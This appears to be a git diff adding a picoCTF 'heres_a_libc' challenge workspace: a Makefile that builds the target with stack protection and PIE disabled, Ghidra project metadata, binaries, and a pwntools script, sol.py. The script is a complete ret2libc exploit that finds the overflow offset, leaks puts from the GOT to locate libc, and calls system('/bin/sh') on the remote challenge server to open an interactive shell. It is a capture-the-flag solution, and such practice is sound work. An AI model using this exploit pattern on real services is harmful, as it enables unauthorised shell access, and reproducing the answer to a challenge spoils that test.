diff --git a/heres_a_libc/.ghidra.test.lock~~ b/heres_a_libc/.ghidra.test.lock~~
new file mode 100644
index 0000000..e69de29
diff --git a/heres_a_libc/Makefile b/heres_a_libc/Makefile
new file mode 100755
index 0000000..6a8d8a8
--- /dev/null
+++ b/heres_a_libc/Makefile
@@ -0,0 +1,5 @@
+all:
+	gcc -Xlinker -rpath=./ -m64 -fno-stack-protector -no-pie -o vuln vuln.c
+
+clean:
+	rm vuln
diff --git a/heres_a_libc/core.148996 b/heres_a_libc/core.148996
new file mode 100644
index 0000000..a89c23c
Binary files /dev/null and b/heres_a_libc/core.148996 differ
diff --git a/heres_a_libc/heres_a_libc.gpr b/heres_a_libc/heres_a_libc.gpr
new file mode 100644
index 0000000..e69de29
diff --git a/heres_a_libc/heres_a_libc.rep/idata/00/00000001.prp b/heres_a_libc/heres_a_libc.rep/idata/00/00000001.prp
new file mode 100644
index 0000000..878a452
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/idata/00/00000001.prp
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e74214007714427800" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="vuln_patched" />
+    </BASIC_INFO>
+</FILE_INFO>
diff --git a/heres_a_libc/heres_a_libc.rep/idata/00/00000002.prp b/heres_a_libc/heres_a_libc.rep/idata/00/00000002.prp
new file mode 100644
index 0000000..abd98b9
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/idata/00/00000002.prp
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e98915179083947600" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="libc.so.6" />
+    </BASIC_INFO>
+</FILE_INFO>
diff --git a/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.2.gbf b/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.2.gbf
new file mode 100644
index 0000000..2cf99e4
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.2.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.3.gbf b/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.3.gbf
new file mode 100644
index 0000000..45a6cb9
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/idata/00/~00000001.db/db.3.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/idata/00/~00000002.db/db.1.gbf b/heres_a_libc/heres_a_libc.rep/idata/00/~00000002.db/db.1.gbf
new file mode 100644
index 0000000..9ff6b9a
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/idata/00/~00000002.db/db.1.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/idata/~index.bak b/heres_a_libc/heres_a_libc.rep/idata/~index.bak
new file mode 100644
index 0000000..fe1ce8a
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/idata/~index.bak
@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000002:libc.so.6:19ef4b6e98915179083947600
+  00000001:vuln_patched:19ef4b6e74214007714427800
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/heres_a_libc.rep/idata/~index.dat b/heres_a_libc/heres_a_libc.rep/idata/~index.dat
new file mode 100644
index 0000000..fe1ce8a
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/idata/~index.dat
@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000002:libc.so.6:19ef4b6e98915179083947600
+  00000001:vuln_patched:19ef4b6e74214007714427800
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/heres_a_libc.rep/project.prp b/heres_a_libc/heres_a_libc.rep/project.prp
new file mode 100644
index 0000000..9ad0e4c
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/project.prp
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="OWNER" TYPE="string" VALUE="MaximeVorwerk" />
+    </BASIC_INFO>
+</FILE_INFO>
diff --git a/heres_a_libc/heres_a_libc.rep/projectState b/heres_a_libc/heres_a_libc.rep/projectState
new file mode 100644
index 0000000..3ddccd1
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/projectState
@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<PROJECT>
+    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
+        <SAVE_STATE>
+            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
+                <A VALUE="heres_a_libc:" />
+            </ARRAY>
+            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
+        </SAVE_STATE>
+    </PROJECT_DATA_XML_NAME>
+    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
+        <WORKSPACE NAME="Workspace" ACTIVE="true" />
+    </TOOL_MANAGER>
+</PROJECT>
+
diff --git a/heres_a_libc/heres_a_libc.rep/user/00/00000001.prp b/heres_a_libc/heres_a_libc.rep/user/00/00000001.prp
new file mode 100644
index 0000000..018c7ab
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/user/00/00000001.prp
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e74714020607205000" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="udf_19ef4b6e74214007714427800" />
+    </BASIC_INFO>
+</FILE_INFO>
diff --git a/heres_a_libc/heres_a_libc.rep/user/00/00000002.prp b/heres_a_libc/heres_a_libc.rep/user/00/00000002.prp
new file mode 100644
index 0000000..4859eda
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/user/00/00000002.prp
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e9ba15286089422300" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="udf_19ef4b6e98915179083947600" />
+    </BASIC_INFO>
+</FILE_INFO>
diff --git a/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.1.gbf b/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.1.gbf
new file mode 100644
index 0000000..256cc9a
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.1.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.2.gbf b/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.2.gbf
new file mode 100644
index 0000000..56963fd
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/user/00/~00000001.db/db.2.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/user/00/~00000002.db/db.1.gbf b/heres_a_libc/heres_a_libc.rep/user/00/~00000002.db/db.1.gbf
new file mode 100644
index 0000000..d4715f4
Binary files /dev/null and b/heres_a_libc/heres_a_libc.rep/user/00/~00000002.db/db.1.gbf differ
diff --git a/heres_a_libc/heres_a_libc.rep/user/~index.bak b/heres_a_libc/heres_a_libc.rep/user/~index.bak
new file mode 100644
index 0000000..b776dc3
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/user/~index.bak
@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/heres_a_libc.rep/user/~index.dat b/heres_a_libc/heres_a_libc.rep/user/~index.dat
new file mode 100644
index 0000000..21c9d1f
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/user/~index.dat
@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000001:udf_19ef4b6e74214007714427800:19ef4b6e74714020607205000
+  00000002:udf_19ef4b6e98915179083947600:19ef4b6e9ba15286089422300
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/heres_a_libc.rep/user/~journal.bak b/heres_a_libc/heres_a_libc.rep/user/~journal.bak
new file mode 100644
index 0000000..0d8dbca
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/user/~journal.bak
@@ -0,0 +1,7 @@
+IADD:00000000:/udf_19ef4b6e72713942339862900
+IDSET:/udf_19ef4b6e72713942339862900:19ef4b6e73013958061907200
+IADD:00000001:/udf_19ef4b6e74214007714427800
+IDSET:/udf_19ef4b6e74214007714427800:19ef4b6e74714020607205000
+IDEL:/udf_19ef4b6e72713942339862900
+IADD:00000002:/udf_19ef4b6e98915179083947600
+IDSET:/udf_19ef4b6e98915179083947600:19ef4b6e9ba15286089422300
diff --git a/heres_a_libc/heres_a_libc.rep/versioned/~index.bak b/heres_a_libc/heres_a_libc.rep/versioned/~index.bak
new file mode 100644
index 0000000..b776dc3
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/versioned/~index.bak
@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/heres_a_libc.rep/versioned/~index.dat b/heres_a_libc/heres_a_libc.rep/versioned/~index.dat
new file mode 100644
index 0000000..b776dc3
--- /dev/null
+++ b/heres_a_libc/heres_a_libc.rep/versioned/~index.dat
@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e
diff --git a/heres_a_libc/ld-2.27.so b/heres_a_libc/ld-2.27.so
new file mode 100755
index 0000000..a2e3b9a
Binary files /dev/null and b/heres_a_libc/ld-2.27.so differ
diff --git a/heres_a_libc/libc.so.6 b/heres_a_libc/libc.so.6
new file mode 100755
index 0000000..5cb8ffa
Binary files /dev/null and b/heres_a_libc/libc.so.6 differ
diff --git a/heres_a_libc/sol.py b/heres_a_libc/sol.py
new file mode 100755
index 0000000..819987f
--- /dev/null
+++ b/heres_a_libc/sol.py
@@ -0,0 +1,61 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+from pwn import *
+
+exe = ELF("./vuln_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.27.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process(exe.path)
+        if args.DEBUG:
+            gdb.attach(r)
+    else:
+        r = remote("mercury.picoctf.net", 23584)
+
+    return r
+
+def get_offset():
+    os.system("rm core.* > /dev/null")
+    proc = process(exe.path)
+    payload = cyclic(150, n=exe.bytes)
+    proc.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!\n", payload)
+    proc.wait()
+    offset = cyclic_find(proc.corefile.fault_addr, n=exe.bytes)
+    log.info("offset: {}".format(offset))
+    return offset
+
+offset = get_offset()
+
+rop = ROP(exe)
+rop.call("puts",[exe.got['puts']])
+rop.do_stuff()
+
+payload = flat({offset: bytes(rop)})
+
+r = conn()
+r.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!\n", payload)
+r.recvline()
+
+puts_addr = int.from_bytes(r.recvline(keepends=False), 'little')
+
+libc.address = puts_addr - libc.symbols['puts']
+log.info("libc address: {}".format(hex(libc.address)))
+
+rop = ROP(exe)
+rop.call('puts', [exe.got['puts']])
+rop.call(libc.symbols["system"], [next(libc.search(b"/bin/sh"))])
+
+payload = flat({offset: bytes(rop)})
+log.info("payload: \n{}".format(hexdump(payload)))
+
+r.sendline(payload)
+r.recvline()
+r.recvline()
+
+r.interactive()
+
diff --git a/heres_a_libc/vuln b/heres_a_libc/vuln
new file mode 100755
index 0000000..93e6661
Binary files /dev/null and b/heres_a_libc/vuln differ
diff --git a/heres_a_libc/vuln_patched b/heres_a_libc/vuln_patched
new file mode 100755
index 0000000..7cbd43e
Binary files /dev/null and b/heres_a_libc/vuln_patched differ